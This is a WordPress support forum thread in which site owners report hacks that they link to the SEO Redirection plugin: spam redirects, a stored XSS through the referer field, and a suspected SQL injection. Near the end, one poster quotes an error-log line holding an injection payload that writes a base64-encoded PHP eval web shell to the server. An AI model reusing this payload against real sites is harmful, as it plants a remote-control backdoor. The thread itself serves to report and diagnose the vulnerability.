I tested the plugin and displayed to me the same message, but there is no XSS in the plugin, ignore this message, I will try to change the parameters name or the tag name to stop this message from being appeared.
Hi Fakhri,
First of all – great plugin. Came in handy many times.
However one of my websites got hacked (sort of) recently. Weirdly the file system was clean but as I started digging it turned out that the SEO_404_links table was full of spammy links to some drug websites.
As a result Google picked up dozens of non-existent PDF’s which were in reality redirects to some dodgy websites.
I truncated the tables and removed the plugin (which solved the issue but still a long way before Google removes the “hacked” flag from search results) but the situation could indicated that there is indeed a vulnerability that allows such hacks.
I’d be happy to open a dialog with you about this potential issue.
please contact me at http://www.clogica.com/contact-us and send a screenshot of these link to address the issue!
Hi Fakhri,
Good day!
I have installed this plugin in one of my site and it got hacked around 3 weeks back and Google displayed “This site might have been hacked” message in the search results. With great difficulty we removed that message from Google search results. But our site got hacked again yesterday, So we did a investigation on this using some tools and we found a vulnerability in the plugin. Please see the below message displayed on the tool which we are using.
XSS Vulnerability in SEO Redirection Plugin
Continuing further investigation we also found that malicious javascript code can be injected by anyone. Can you please look into this and let us know if any of this is true?
SEO Redirection Plugin is vulnerable to stored XSS. On the “Settings > SEO Redirection > Redirection History” screen the referer link is not filtered. Malicious javascript code can be injected by anyone.
Thank you for your time. Have a nice day.
Hi,
I will check this issue and solve it soon.
Thank you
Hi Fakhri,
One of my websites was recently hacked and my web developer tells me this was due to an sql injection on your plugin.
Can you confirm this?
Thanks,
Simon
My site was hacked. in the error log i found this line:
[16-Jun-2016 04:48:21 UTC] WordPress database error You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
‘>|’; file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/webconfig.txt.php’,base64_deco’ at line 1 for query select * from cbhac_WP_SEO_Redirection where enabled=1 and
regex=”
and (redirect_from=’/?1=@ini_set(“display_errors”,”0″);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo ‘->|’;
file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/webconfig.txt.php’,base64_decode(‘PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+’));
echo ‘|<-‘;’
or redirect_from=’/?1=@ini_set(“display_errors”,”0″);
@set_time_limit(0);@set_magic_quotes_runtime(0);
echo ‘->|’;
file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/webconfig.txt.php’,base64_decode(‘PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+’));
echo ‘|<-‘;/’ ) made by require(‘wp-blog-header.php’), wp, WP->main, do_action_ref_array, call_user_func_array, WPSR_redirect, W3_Db->query, W3_DbCache->query, W3_DbCallUnderlying->query, W3_Db->query, W3_DbProcessor->query, W3_Db->default_query
@the_specialist2005: This is not your topic. If you require assistance then, as per the Forum Welcome, please post your own topic.
